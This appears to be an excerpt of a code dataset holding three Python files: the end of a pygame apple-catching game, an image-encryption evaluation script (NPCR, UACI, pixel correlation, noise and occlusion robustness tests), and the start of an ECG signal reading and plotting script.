self.rect.y = value\r\n\r\n    Y = property(_gety, _sety)\r\n\r\n    def _getpos(self):\r\n        return self.rect.topleft\r\n\r\n    def _setpos(self, pos):\r\n        self.rect.topleft = pos\r\n\r\n    position = property(_getpos, _setpos)\r\n\r\n    def load(self, filename, width, height, columns):\r\n        self.master_image = pygame.image.load(filename).convert_alpha()\r\n        self.frame_width = width\r\n        self.frame_height = height\r\n        self.rect = Rect(0, 0, width, height)\r\n        self.columns = columns\r\n        rect = self.master_image.get_rect()\r\n        self.last_frame = (rect.width // width) * (rect.height // height) - 1\r\n        self.image = self.master_image.subsurface(Rect(0, 0, min(width, self.master_image.get_width()),\r\n                                                       min(height, self.master_image.get_height()))).copy()\r\n\r\n        # set the image attribute\r\n\r\n    def update(self, current_time, rate=30):\r\n        if current_time > self.last_time + rate:\r\n            self.frame += 1\r\n            if self.frame > self.last_frame:\r\n                self.frame = self.first_frame\r\n            self.last_time = current_time\r\n\r\n        if self.frame != self.old_frame:\r\n            frame_x = (self.frame % self.columns) * self.frame_width\r\n            frame_y = (self.frame // self.columns) * self.frame_height\r\n\r\n            frame_rect = Rect(frame_x, frame_y, self.frame_width, self.frame_height)\r\n            image_rect = self.master_image.get_rect()\r\n\r\n            if frame_rect.right > image_rect.width or frame_rect.bottom > image_rect.height:\r\n                frame_rect = image_rect\r\n\r\n            self.image = self.master_image.subsurface(frame_rect).copy()\r\n            self.old_frame = self.frame\r\n\r\n# Point class\r\nclass Point(object):\r\n    def __init__(self, x, y):\r\n        self.__x = x\r\n        self.__y = y\r\n\r\n    def getx(self):\r\n        return self.__x\r\n\r\n    def setx(self, x):\r\n        self.__x = x\r\n\r\n    x = property(getx, setx)\r\n\r\n    def gety(self):\r\n        return self.__y\r\n\r\n    def sety(self, y):\r\n        self.__y = y\r\n\r\n    y = property(gety, sety)\r\n\r\n    def __str__(self):\r\n        return \"{X:\" + \"{:.0f}\".format(self.__x) + \",Y:\" + \"{:.0f}\".format(self.__y) + \"}\"\r\n\r\n\r\n# noinspection PyTypeChecker\r\ndef hard_mode():\r\n    # Initialize pygame\r\n    pygame.init()\r\n    screen3 = pygame.display.set_mode((800, 600))\r\n    pygame.display.set_caption(\"Catch Apples\")\r\n    font = pygame.font.Font(None, 50)\r\n    timer = pygame.time.Clock()\r\n\r\n    # Create sprite groups\r\n    player_group = pygame.sprite.Group()\r\n    apple1_group = pygame.sprite.Group()\r\n\r\n    # Initialize the player sprite group\r\n    player = MySprite()\r\n    player.load(\"./images/player_animation.png\", 96, 96, 8)\r\n    player.position = 80, 500\r\n    player.direction = 0\r\n    player_group.add(player)\r\n\r\n    # Initialize the apple sprite group\r\n    for i in range(10):\r\n        apple = MySprite()\r\n        apple.load(\"./images/apple.png\", 64, 64, 1)\r\n        apple.position = random.randint(100, 700), random.randint(-200, -100)\r\n        apple.velocity = Point(0, random.randint(2, 6))\r\n        apple1_group.add(apple)\r\n\r\n    game_over = False  # controls the game state, initially False\r\n    player_moving = False  # controls player movement, initially False\r\n    score2 = 0  # score starts at 0\r\n    high_score = 0  # high score\r\n\r\n    # Game duration (seconds)\r\n    game_time = 60\r\n    start_time = time.time()  # record the start time\r\n\r\n    # Initialize the high score\r\n    try:\r\n        with open(\"high_score3.txt\", \"r\") as file:\r\n            high_score = int(file.read())\r\n    except FileNotFoundError:\r\n        with open(\"high_score3.txt\", \"w\") as file:\r\n            file.write(str(high_score))\r\n\r\n    def show_game_over_screen():\r\n        image1 = pygame.image.load(\"./images/bg4.png\")\r\n        font1 = pygame.font.Font(None, 50)\r\n        font2 = pygame.font.Font(None, 70)\r\n        screen3.blit(image1, (0, 0))\r\n        print_text1(font1, 295, 120, \"Game Over\", (0, 0, 0))  # display the Game Over text when the game ends\r\n        print_text1(font2, 300, 220, \"Score: \" + 
str(score2), (0, 0, 0))  # show the score when the game ends\r\n        print_text1(font1, 290, 355, \"HighScore: \" + str(high_score), (190, 0, 0))\r\n        print_text1(font1, 320, 480, \"ESC exits\", (0, 0, 0))\r\n        keys1 = pygame.key.get_pressed()\r\n        if keys1[K_ESCAPE]:\r\n            restart_game()\r\n        pygame.display.update()\r\n\r\n    # Load the image\r\n    image = pygame.image.load(\"./images/img.png\")\r\n\r\n    def show_game_over_screen1():\r\n        screen3.blit(image, (0, 0))\r\n        print_text1(font, 100, 200, \"Congratulations on breaking the record\", (139, 0, 0))\r\n        print_text1(font, 100, 250, \"Your score is: \" + str(score2), (139, 0, 0))\r\n        pygame.display.flip()\r\n\r\n    while True:\r\n        timer.tick(30)\r\n        Ticks = pygame.time.get_ticks()\r\n\r\n        for event in pygame.event.get():\r\n            if event.type == QUIT:\r\n                pygame.quit()\r\n                exit()\r\n\r\n        keys = pygame.key.get_pressed()\r\n        if keys[K_ESCAPE]:\r\n            restart_game()\r\n        elif keys[K_UP] or keys[K_w]:\r\n            player.direction = 0\r\n            player_moving = True\r\n        elif keys[K_RIGHT] or keys[K_d]:\r\n            player.direction = 2\r\n            player_moving = True\r\n        elif keys[K_DOWN] or keys[K_s]:\r\n            player.direction = 4\r\n            player_moving = True\r\n        elif keys[K_LEFT] or keys[K_a]:\r\n            player.direction = 6\r\n            player_moving = True\r\n        else:\r\n            player_moving = False\r\n\r\n        if not game_over:\r\n            player.first_frame = player.direction * player.columns\r\n            player.last_frame = player.first_frame + player.columns - 1\r\n            if player.frame < player.first_frame:\r\n                player.frame = player.first_frame\r\n\r\n            if not player_moving:\r\n                player.frame = player.first_frame = player.last_frame\r\n            else:\r\n                player.velocity = Point(0.0, 0.0)\r\n                if player.direction == 0:\r\n                    player.velocity.y = -6\r\n                elif player.direction == 2:\r\n                    player.velocity.x = 6\r\n                elif player.direction == 4:\r\n                    player.velocity.y = 6\r\n                elif player.direction == 6:\r\n                    player.velocity.x = -6\r\n\r\n            if player_moving:\r\n                player.X += player.velocity.x\r\n                player.Y += player.velocity.y\r\n                if player.X < 0:\r\n                    player.X = 0\r\n                elif player.X > 700:\r\n                    player.X = 700\r\n                if player.Y < 0:\r\n                    player.Y = 0\r\n                elif player.Y > 500:\r\n                    player.Y = 500\r\n\r\n            player_group.update(Ticks, 60)\r\n\r\n            for apple in apple1_group:\r\n                apple.Y += apple.velocity.y\r\n                if apple.Y > 600:\r\n                    apple.X = random.randint(100, 700)\r\n                    apple.Y = random.randint(-200, -100)\r\n\r\n                if pygame.sprite.collide_rect_ratio(0.5)(player, apple):\r\n                    apple_sound.play()\r\n                    apple.X = random.randint(100, 700)\r\n                    apple.Y = random.randint(-200, -100)\r\n                    score2 += 1\r\n\r\n            apple1_group.update(Ticks, 70)\r\n\r\n            if time.time() - start_time > game_time:\r\n                game_over = True\r\n\r\n            screen3.blit(background_surface2, (0, 0))\r\n            apple1_group.draw(screen3)\r\n            player_group.draw(screen3)\r\n            print_text1(font, 0, 0, \"Score: \" + str(score2), (54, 54, 54))\r\n            print_text1(font, 650, 0, \"Time: \" + str(int(game_time - (time.time() - start_time))), (54, 54, 54))\r\n        else:\r\n            if high_score < score2:\r\n                high_score = score2\r\n                with open(\"high_score3.txt\", \"w\") as file:\r\n                    file.write(str(high_score))\r\n                show_game_over_screen1()\r\n            else:\r\n                show_game_over_screen()  # game over, draw the game-over screen\r\n                time.sleep(3)\r\n                restart_game()\r\n\r\n        pygame.display.update()\r\n\r\n\r\n# Restart-game function\r\ndef restart_game():\r\n    global MOVE_STATUS, OVER_FLAG, START_TIME, offset, ticks, score\r\n    MOVE_STATUS = False\r\n    OVER_FLAG = False\r\n    START_TIME = None\r\n    offset = {pygame.K_LEFT: 0, pygame.K_RIGHT: 0, pygame.K_UP: 0, pygame.K_DOWN: 0,\r\n              pygame.K_w: 0, pygame.K_a: 0, pygame.K_s: 0, pygame.K_d: 0}  # reset the initial position\r\n    
apple_group.empty()  # clear the apple group\r\n    bomb_group.empty()  # clear the bomb group\r\n    pygame.mixer.music.stop()  # stop the music\r\n    pygame.mixer.music.play(-1)  # replay the music\r\n    main()\r\n    ticks = 0\r\n    score = 0\r\n    monkey.apple_num = 0\r\n    score_surface = score_font.render(str(monkey.apple_num), True, (255, 255, 255))\r\n    screen.blit(score_surface, (620, 10))\r\n    # Update the screen\r\n    pygame.display.update()\r\n\r\n\r\n# Read the high score from a file\r\ndef load_high_score():\r\n    try:\r\n        with open('high_score.txt', 'r') as f:\r\n            high_score = int(f.read())\r\n    except FileNotFoundError:\r\n        # handle a missing file\r\n        high_score = 0\r\n    except ValueError:\r\n        # handle file contents that cannot be converted to an integer\r\n        high_score = 0\r\n    else:\r\n        # if no exception occurred, close the file\r\n        f.close()\r\n    return high_score\r\n\r\n# Save the high score to a file\r\ndef save_high_score(high_score):\r\n    with open('high_score.txt', 'w') as f:\r\n        f.write(str(high_score))\r\n\r\n\r\n# noinspection DuplicatedCode,PyTypeChecker\r\ndef easy():\r\n    pygame.init()\r\n    screen1 = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\r\n    pygame.mixer.music.load(\"./images/music1.mp3\")\r\n\r\n    # Play music\r\n    pygame.mixer.music.set_volume(0.5)\r\n    pygame.mixer.music.play(-1)\r\n    # Initialize fonts\r\n    score1_font = pygame.font.SysFont(\"arial\", 70)\r\n    over_font = pygame.font.SysFont(\"arial\", 40)\r\n    high_score_font = pygame.font.SysFont(\"arial\", 40)\r\n    monkey1 = Monkey(monkey_surface, (200, 500))\r\n    monkey1.apple_num = 0\r\n    ticks_2 = 0\r\n    high_score = load_high_score()\r\n    # Main loop\r\n    while True:\r\n        if OVER_FLAG:\r\n            break\r\n\r\n        # Cap the frame rate\r\n        clock.tick(FRAME_RATE)\r\n\r\n        # Draw the background\r\n        screen.blit(background_surface, (0, 0))\r\n        if ticks_2 >= ANIMATE_CYCLE:\r\n            ticks_2 = 0\r\n\r\n        if ticks_2 % 40 == 0 and len(apple_group) <= 15:\r\n            apple = Apple(apple_surface,\r\n                          [randint(0, SCREEN_WIDTH - apple_surface.get_width()), -apple_surface.get_height()])\r\n            while pygame.sprite.spritecollide(apple, bomb_group, False):\r\n                apple.rect.top = -apple_surface.get_height()\r\n                apple.rect.left = randint(0, SCREEN_WIDTH - apple_surface.get_width())\r\n            apple_group.add(apple)\r\n\r\n        if len(apple_group) >= 15 and ticks_2 % 30 == 0 and len(bomb_group) < 3:\r\n            bomb = Bomb(bomb_surface1,\r\n                        [randint(0, SCREEN_WIDTH - bomb_surface1.get_width()), -bomb_surface1.get_height()])\r\n            while pygame.sprite.spritecollide(bomb, apple_group, False):\r\n                bomb.rect.top = -bomb_surface1.get_height()\r\n                bomb.rect.left = randint(0, SCREEN_WIDTH - bomb_surface1.get_width())\r\n            bomb_group.add(bomb)\r\n\r\n        # Move the apples and bombs\r\n        apple_group.update()\r\n        bomb_group.update()\r\n        # Draw the apple group\r\n        apple_group.draw(screen)\r\n        # Draw the bomb group\r\n        bomb_group.draw(screen)\r\n\r\n        # Draw the monkey\r\n        screen.blit(monkey_surface, monkey1.rect)\r\n        ticks_2 += 1\r\n\r\n        # Catch apples\r\n        monkey1.picking_apple(apple_group)\r\n        monkey1.picking_bomb(bomb_group)\r\n        # Update the score\r\n        score_surface = score_font.render(str(monkey1.apple_num), True, (255, 255, 255))\r\n        screen.blit(score_surface, (640, 10))\r\n        if high_score > monkey1.apple_num:\r\n            high_score_surface = high_score_font.render(\"Highest: \" + str(high_score), True, (255, 255, 255))\r\n        else:\r\n            high_score = monkey1.apple_num\r\n            high_score_surface = high_score_font.render(\"Highest: \" + str(high_score), True, (255, 255, 255))\r\n            save_high_score(high_score)\r\n        # Draw the high score\r\n        screen.blit(high_score_surface, (10, 10))\r\n\r\n        # Update the screen\r\n        pygame.display.update()\r\n\r\n        for event in pygame.event.get():\r\n            if event.type == pygame.QUIT:\r\n                pygame.quit()\r\n                exit()\r\n\r\n            # Control direction\r\n            if event.type == pygame.KEYDOWN:\r\n                if event.key in offset:\r\n                    if event.key == pygame.K_UP:\r\n                        offset[event.key] = 
80\r\n                    else:\r\n                        offset[event.key] = monkey1.speed\r\n            elif event.type == pygame.KEYUP:\r\n                if event.key in offset:\r\n                    offset[event.key] = 0\r\n        monkey1.move(offset)\r\n\r\n    # Main game-over loop\r\n    while True:\r\n        # Button font\r\n        button_font = pygame.font.SysFont(\"Georgia\", 40)\r\n        # Restart button\r\n        restart_surface = button_font.render(\"Restart\", True, (255, 255, 255))\r\n        restart_rect = restart_surface.get_rect(center=(SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2 + 200))\r\n\r\n        # Event handling\r\n        for event in pygame.event.get():\r\n            if event.type == pygame.QUIT:\r\n                pygame.quit()\r\n                exit()\r\n            elif event.type == pygame.MOUSEBUTTONDOWN:\r\n                # check if the user clicked the restart button\r\n                if restart_rect.collidepoint(event.pos):\r\n                    # restart the game\r\n                    restart_game()\r\n                    apple_group.empty()\r\n                    bomb_group.empty()\r\n                    pygame.mixer.music.set_volume(0.5)\r\n                    pygame.mixer.music.stop()\r\n                    pygame.mixer.music.play(-1)\r\n                    # exit the game\r\n                    break\r\n\r\n        high_score1_surface = high_score_font.render(\"Highest: \" + str(high_score), True, (190, 0, 0))\r\n        score1_surface = score1_font.render(\"Score: \" + str(monkey1.apple_num), True, (0, 0, 0))\r\n        over1_surface = over_font.render(\"Game Over!\", True, (0, 0, 0))\r\n        # Game-over exit screen\r\n        screen1.blit(background_surface3, (0, 0))\r\n        screen1.blit(score1_surface, (285, 200))\r\n        screen1.blit(over1_surface, (305, 105))\r\n        screen1.blit(high_score1_surface, (300, 350))\r\n        screen1.blit(restart_surface, restart_rect)\r\n        pygame.display.flip()\r\n\r\n\r\n# Main game function\r\n# noinspection DuplicatedCode,PyTypeChecker\r\ndef main():\r\n    pygame.init()\r\n    screen1 = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\r\n    pygame.mixer.music.load(\"./images/music1.mp3\")\r\n\r\n    # Play music\r\n    pygame.mixer.music.set_volume(0.5)\r\n    pygame.mixer.music.play(-1)\r\n    # Initialize fonts\r\n    score1_font = pygame.font.SysFont(\"arial\", 70)\r\n    over_font = pygame.font.SysFont(\"arial\", 40)\r\n    high_score_font = pygame.font.SysFont(\"arial\", 40)\r\n    monkey1 = Monkey(monkey_surface, (200, 500))\r\n    monkey1.apple_num = 0\r\n    main_menu()\r\n    ticks_1 = 0\r\n    high_score = load_high_score()\r\n    # Main loop\r\n    while True:\r\n        if OVER_FLAG:\r\n            break\r\n\r\n        # Cap the frame rate\r\n        clock.tick(FRAME_RATE)\r\n\r\n        # Draw the background\r\n        screen.blit(background_surface, (0, 0))\r\n        if ticks_1 >= ANIMATE_CYCLE:\r\n            ticks_1 = 0\r\n\r\n        if ticks_1 % 40 == 0 and len(apple_group) <= 15:\r\n            apple = Apple(apple_surface,\r\n                          [randint(0, SCREEN_WIDTH - apple_surface.get_width()), -apple_surface.get_height()])\r\n            while pygame.sprite.spritecollide(apple, bomb_group, False):\r\n                apple.rect.top = -apple_surface.get_height()\r\n                apple.rect.left = randint(0, SCREEN_WIDTH - apple_surface.get_width())\r\n            apple_group.add(apple)\r\n\r\n        if len(apple_group) >= 15 and ticks_1 % 30 == 0 and len(bomb_group) < 3:\r\n            bomb = Bomb(bomb_surface1,\r\n                        [randint(0, SCREEN_WIDTH - bomb_surface1.get_width()), -bomb_surface1.get_height()])\r\n            while pygame.sprite.spritecollide(bomb, apple_group, False):\r\n                bomb.rect.top = -bomb_surface1.get_height()\r\n                bomb.rect.left = randint(0, SCREEN_WIDTH - bomb_surface1.get_width())\r\n            bomb_group.add(bomb)\r\n\r\n        # Move the apples and bombs\r\n        apple_group.update()\r\n        bomb_group.update()\r\n        # Draw the apple group\r\n        apple_group.draw(screen)\r\n        # Draw the bomb group\r\n        bomb_group.draw(screen)\r\n\r\n        # Draw the monkey\r\n        screen.blit(monkey_surface, monkey1.rect)\r\n        ticks_1 += 1\r\n\r\n        # Catch apples\r\n        monkey1.picking_apple(apple_group)\r\n        monkey1.picking_bomb(bomb_group)\r\n        # Update the score\r\n        score_surface = score_font.render(str(monkey1.apple_num), True, (255, 255, 255))\r\n        screen.blit(score_surface, (640, 10))\r\n        if high_score > 
monkey1.apple_num:\r\n            high_score_surface = high_score_font.render(\"Highest: \" + str(high_score), True, (255, 255, 255))\r\n        else:\r\n            high_score = monkey1.apple_num\r\n            high_score_surface = high_score_font.render(\"Highest: \" + str(high_score), True, (255, 255, 255))\r\n            save_high_score(high_score)\r\n        # Draw the high score\r\n        screen.blit(high_score_surface, (10, 10))\r\n\r\n        # Update the screen\r\n        pygame.display.update()\r\n\r\n        for event in pygame.event.get():\r\n            if event.type == pygame.QUIT:\r\n                pygame.quit()\r\n                exit()\r\n\r\n            # Control direction\r\n            if event.type == pygame.KEYDOWN:\r\n                if event.key in offset:\r\n                    if event.key == pygame.K_UP:\r\n                        offset[event.key] = 80\r\n                    else:\r\n                        offset[event.key] = monkey1.speed\r\n            elif event.type == pygame.KEYUP:\r\n                if event.key in offset:\r\n                    offset[event.key] = 0\r\n        monkey1.move(offset)\r\n\r\n    # Main game-over loop\r\n    while True:\r\n        # Button font\r\n        button_font = pygame.font.SysFont(\"Georgia\", 40)\r\n        # Restart button\r\n        restart_surface = button_font.render(\"Restart\", True, (255, 255, 255))\r\n        restart_rect = restart_surface.get_rect(center=(SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2 + 200))\r\n\r\n        # Event handling\r\n        for event in pygame.event.get():\r\n            if event.type == pygame.QUIT:\r\n                pygame.quit()\r\n                exit()\r\n            elif event.type == pygame.MOUSEBUTTONDOWN:\r\n                # check if the user clicked the restart button\r\n                if restart_rect.collidepoint(event.pos):\r\n                    # restart the game\r\n                    restart_game()\r\n                    apple_group.empty()\r\n                    bomb_group.empty()\r\n                    pygame.mixer.music.set_volume(0.5)\r\n                    pygame.mixer.music.stop()\r\n                    pygame.mixer.music.play(-1)\r\n                    # exit the game\r\n                    break\r\n\r\n        high_score1_surface = high_score_font.render(\"Highest: \" + str(high_score), True, (190, 0, 0))\r\n        score1_surface = score1_font.render(\"Score: \" + str(monkey1.apple_num), True, (0, 0, 0))\r\n        over1_surface = over_font.render(\"Game Over!\", True, (0, 0, 0))\r\n        # Game-over exit screen\r\n        screen1.blit(background_surface3, (0, 0))\r\n        screen1.blit(score1_surface, (285, 200))\r\n        screen1.blit(over1_surface, (305, 105))\r\n        screen1.blit(high_score1_surface, (300, 350))\r\n        screen1.blit(restart_surface, restart_rect)\r\n        pygame.display.flip()\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","repo_name":"MJEDssg/-","sub_path":"接苹果_5.py","file_name":"接苹果_5.py","file_ext":"py","file_size_in_byte":28535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"42028565867","text":"import random\r\nimport cv2\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# Compute the number of pixels change rate (NPCR)\r\n\r\ndef NPCR(img1,img2):\r\n    # OpenCV channel order is BGR\r\n    w,h,_=img1.shape\r\n\r\n    # Split the image channels\r\n    B1,G1,R1=cv2.split(img1)\r\n    B2,G2,R2=cv2.split(img2)\r\n\r\n    # np.unique returns the sorted unique elements of the array and the count of each\r\n    ar,num=np.unique((R1!=R2),return_counts=True)\r\n    R_npcr=(num[0] if ar[0]==True else num[1])/(w*h)\r\n    ar,num=np.unique((G1!=G2),return_counts=True)\r\n    G_npcr=(num[0] if ar[0]==True else num[1])/(w*h)\r\n    ar,num=np.unique((B1!=B2),return_counts=True)\r\n    B_npcr=(num[0] if ar[0]==True else num[1])/(w*h)\r\n\r\n    return R_npcr,G_npcr,B_npcr\r\n\r\n\r\n# Unified average changing intensity (UACI) between two images\r\n\r\ndef UACI(img1,img2):\r\n    w,h,_=img1.shape\r\n    # Split the image channels\r\n    B1,G1,R1=cv2.split(img1)\r\n    B2,G2,R2=cv2.split(img2)\r\n    # elements are uint8, valued 0 to 255\r\n\r\n    # print(R1.dtype)\r\n\r\n    # cast the element type so the subtraction does not overflow\r\n    R1=R1.astype(np.int16)\r\n    R2=R2.astype(np.int16)\r\n    G1=G1.astype(np.int16)\r\n    G2=G2.astype(np.int16)\r\n    B1=B1.astype(np.int16)\r\n    B2=B2.astype(np.int16)\r\n\r\n    sumR=np.sum(abs(R1-R2))\r\n    sumG=np.sum(abs(G1-G2))\r\n    sumB=np.sum(abs(B1-B2))\r\n    R_uaci=sumR/255/(w*h)\r\n    G_uaci=sumG/255/(w*h)\r\n    B_uaci=sumB/255/(w*h)\r\n\r\n    
return R_uaci,G_uaci,B_uaci\r\n\r\ndef RBG_correlation(channel, N):\r\n    hight, width = channel.shape\r\n    row = np.random.randint(0, hight-1, N)\r\n    col = np.random.randint(0, width-1, N)\r\n    x = []\r\n    y = []\r\n    # vertically adjacent pixels\r\n    v_y = []\r\n    # horizontally adjacent pixels\r\n    h_y = []\r\n    # diagonally adjacent pixels\r\n    d_y = []\r\n    for i in range(N):\r\n        x.append(channel[row[i]][col[i]])\r\n        h_y.append(channel[row[i]][col[i]+1])\r\n        v_y.append(channel[row[i]+1][col[i]])\r\n        d_y.append(channel[row[i]+1][col[i]+1])\r\n\r\n    # combine the three directions\r\n    x = x*3\r\n    y = h_y + v_y + d_y\r\n\r\n    # compute E(x)\r\n    ex = 0\r\n    for i in range(N):\r\n        ex = ex + channel[row[i]][col[i]]\r\n    ex = ex / N\r\n\r\n    # compute D(x)\r\n    dx = 0\r\n    for i in range(N):\r\n        dx = dx + (channel[row[i]][col[i]]-ex)**2\r\n    dx = dx / N\r\n\r\n    # compute E(y)\r\n    h_ey = 0\r\n    v_ey = 0\r\n    d_ey = 0\r\n    for i in range(N):\r\n        h_ey = h_ey + channel[row[i]][col[i] + 1]\r\n        v_ey = v_ey + channel[row[i] + 1][col[i]]\r\n        d_ey = d_ey + channel[row[i] + 1][col[i] + 1]\r\n    h_ey = h_ey / N\r\n    v_ey = v_ey / N\r\n    d_ey = d_ey / N\r\n\r\n    # compute D(y)\r\n    h_dy = 0\r\n    v_dy = 0\r\n    d_dy = 0\r\n    for i in range(N):\r\n        h_dy = h_dy + (channel[row[i]][col[i] + 1] - h_ey) ** 2\r\n        v_dy = v_dy + (channel[row[i] + 1][col[i]] - v_ey) ** 2\r\n        d_dy = d_dy + (channel[row[i] + 1][col[i] + 1] - d_ey) ** 2\r\n    h_dy = h_dy / N\r\n    v_dy = v_dy / N\r\n    d_dy = d_dy / N\r\n\r\n    # compute the covariance\r\n    h_cov = 0\r\n    v_cov = 0\r\n    d_cov = 0\r\n    for i in range(N):\r\n        h_cov = h_cov + (channel[row[i]][col[i]] - ex) * (channel[row[i]][col[i] + 1] - h_ey)\r\n        v_cov = v_cov + (channel[row[i]][col[i]] - ex) * (channel[row[i] + 1][col[i]] - v_ey)\r\n        d_cov = d_cov + (channel[row[i]][col[i]] - ex) * (channel[row[i] + 1][col[i] + 1] - d_ey)\r\n    v_cov = v_cov / N\r\n    h_cov = h_cov / N\r\n    d_cov = d_cov / N\r\n    h_Rxy = h_cov / (np.sqrt(dx) * np.sqrt(h_dy))\r\n    v_Rxy = v_cov / (np.sqrt(dx) * np.sqrt(v_dy))\r\n    d_Rxy = d_cov / (np.sqrt(dx) * np.sqrt(d_dy))\r\n    return h_Rxy, v_Rxy, d_Rxy, x, y\r\n\r\ndef correlation(img, N=3000):\r\n    hight, weight, _ = img.shape\r\n    B, G, R = cv2.split(img)\r\n    R_Rxy = RBG_correlation(R, N)\r\n    B_Rxy = RBG_correlation(B, N)\r\n    G_Rxy = RBG_correlation(G, N)\r\n    return R_Rxy, B_Rxy, G_Rxy\r\n\r\n# Add Gaussian noise with mean 0 and variance 0.001 to the decrypted image\r\ndef gauss_noise(img, mean = 0, var = 0.001):\r\n    img = np.array(img / 255, dtype=float)\r\n    noise = np.random.normal(mean, var ** 0.5, img.shape)\r\n    out = img + noise\r\n    if out.min() < 0:\r\n        low_clip = -1\r\n    else:\r\n        low_clip = 0\r\n    out = np.clip(out, low_clip, 1.0)\r\n    out = np.uint8(out * 255)\r\n    return out\r\n\r\n# Add salt-and-pepper noise, 10% by default\r\ndef salt_and_pepper_noise(img, proportation = 0.1):\r\n    height, width, _ = img.shape\r\n    num = int(height * width * proportation)\r\n    for i in range(num):\r\n        w = random.randint(0, width - 1)\r\n        h = random.randint(0, height - 1)\r\n        if random.randint(0, 1) == 0:\r\n            img[h, w] = 0\r\n        else:\r\n            img[h,w] = 255\r\n    return img\r\n\r\n# Occlusion attack\r\ndef occlusion(img):\r\n    height, width, _ = img.shape\r\n    B, G, R = cv2.split(img)\r\n    # randomly remove an 80x80 pixel block from the R channel\r\n    # generate random integers\r\n    R_w = random.randint(0, width - 80)\r\n    R_h = random.randint(0, height - 80)\r\n    for i in range(80):\r\n        for j in range(80):\r\n            R[R_h + i][R_w + j] = 0\r\n    # randomly remove a 50x80 pixel block from the G channel\r\n    # generate random integers\r\n    G_w = random.randint(0, width - 50)\r\n    G_h = random.randint(0, height - 80)\r\n    for i in range(80):\r\n        for j in range(50):\r\n            G[G_h + i][G_w + j] = 0\r\n    # randomly remove an 80x80 pixel block from the B channel\r\n    # generate random integers\r\n    #B_w = random.randint(0, width - 80)\r\n    #B_h = random.randint(0, height - 80)\r\n    #for i in range(80):\r\n    #    for j in range(80):\r\n    #        B[B_h + 
i][B_w + j] = 0\r\n    out = cv2.merge([R, G, B])\r\n    # randomly remove a 60x50 block across all channels\r\n    a_w = random.randint(0, width - 60)\r\n    a_h = random.randint(0, height - 50)\r\n    for i in range(50):\r\n        for j in range(60):\r\n            out[a_h + i][a_w + j] = np.array([0, 0, 0])\r\n    return out\r\n\r\ndef evaluate(x,e):\r\n    # x is the original image, e is the encrypted image\r\n    # Image correlation\r\n    R1_Rxy, B1_Rxy, G1_Rxy = correlation(x)\r\n    R2_Rxy, B2_Rxy, G2_Rxy = correlation(e)\r\n    # Show the results\r\n    # adjacent-pixel correlation of the plaintext image is close to 1, while that of the ciphertext image should be close to 0\r\n    plt.rcParams['font.sans-serif'] = ['SimHei']\r\n    plt.subplot(221)\r\n    plt.imshow(x[:, :, (2, 1, 0)])\r\n    plt.title('Original image')\r\n    plt.subplot(222)\r\n    plt.scatter(R1_Rxy[3], R1_Rxy[4], s=1, c='red')\r\n    plt.title('Channel R')\r\n    plt.subplot(223)\r\n    plt.scatter(G1_Rxy[3], G1_Rxy[4], s=1, c='green')\r\n    plt.title('Channel G')\r\n    plt.subplot(224)\r\n    plt.scatter(B1_Rxy[3], B1_Rxy[4], s=1, c='blue')\r\n    plt.title('Channel B')\r\n    plt.show()\r\n    plt.rcParams['font.sans-serif'] = ['SimHei']\r\n    plt.subplot(221)\r\n    plt.imshow(e[:, :, (2, 1, 0)])\r\n    plt.title('Encrypted image')\r\n    plt.subplot(222)\r\n    plt.scatter(R2_Rxy[3], R2_Rxy[4], s=1, c='red')\r\n    plt.title('Channel R')\r\n    plt.subplot(223)\r\n    plt.scatter(G2_Rxy[3], G2_Rxy[4], s=1, c='green')\r\n    plt.title('Channel G')\r\n    plt.subplot(224)\r\n    plt.scatter(B2_Rxy[3], B2_Rxy[4], s=1, c='blue')\r\n    plt.title('Channel B')\r\n    plt.show()\r\n\r\n    r_npcr,g_npcr,b_npcr = NPCR(x, e)\r\n    r_uaci,g_uaci,b_uaci = UACI(x, e)\r\n    # Their ideal values are, respectively,\r\n    # NPCR = 99.6094%, UACI = 33.4635%\r\n\r\n    print('*****NPCR*****')\r\n    print('RED   :{:.4%}'.format(r_npcr))\r\n    print('GREEN :{:.4%}'.format(g_npcr))\r\n    print('BLUE  :{:.4%}'.format(b_npcr))\r\n\r\n    print('*****UACI*****')\r\n    print('RED   :{:.4%}'.format(r_uaci))\r\n    print('GREEN :{:.4%}'.format(g_uaci))\r\n    print('BLUE  :{:.4%}'.format(b_uaci))\r\n\r\n","repo_name":"Isabel-jin/images_encryption","sub_path":"evalution.py","file_name":"evalution.py","file_ext":"py","file_size_in_byte":7321,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
{"seq_id":"43452458181","text":"import wfdb as wfdb\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Draw ECG\ndef draw_ecg(x):\n    plt.plot(x)\n    plt.title('Raw_ECG')\n    plt.show()\n    \n#Draw the ECG and its R wave position\ndef draw_ecg_R(p_sTitle, p_signal,annotation,record=None):\n    if record is not None:\n        p_signal = record.p_signal\n    plt.plot(p_signal) #Draw the ECG signal\n    if annotation is not None:\n        R_v=p_signal[annotation.sample] #Get R wave peak value\n        for nIndex, nAnnotationSample in enumerate(annotation.sample):\n            if annotation.num[nIndex] == 0:\n                sColor = \"r\"\n            else:\n                sColor = \"b\"\n            #plt.plot(annotation.sample,R_v, 'o' + sColor)#Draw R wave\n            plt.plot(nAnnotationSample,R_v[nIndex],'o' + sColor)#Draw R wave\n    plt.title(p_sTitle)\n    plt.show()\ndef selData(record,annotation,label,R_left):\n    a=annotation.symbol\n    f=[k for k in range(len(a)) if a[k]==label] #Find the corresponding label R wave position index\n    signal=record.p_signal\n    R_pos=annotation.sample[f]\n    res=[]\n    for i in range(len(f)):\n        if(R_pos[i]-R_left>0):\n            res.append(signal[R_pos[i]-R_left:R_pos[i]-R_left+250])\n    return res\n    \n# Read ECG data\ndef read_ecg_data(filePath,channel_names, p_bIsReadingAnnotations=True, p_bIsVerbose=False):\n    '''\n    Read ECG file\n    sampfrom: Set the starting position for reading the ECG signal, sampfrom=0 means to start reading from 0, and the default starts from 0\n    sampto: Set the end position of reading the ECG signal, sampto = 1500 means the end from 1500, the default is to read to the end of the file\n    
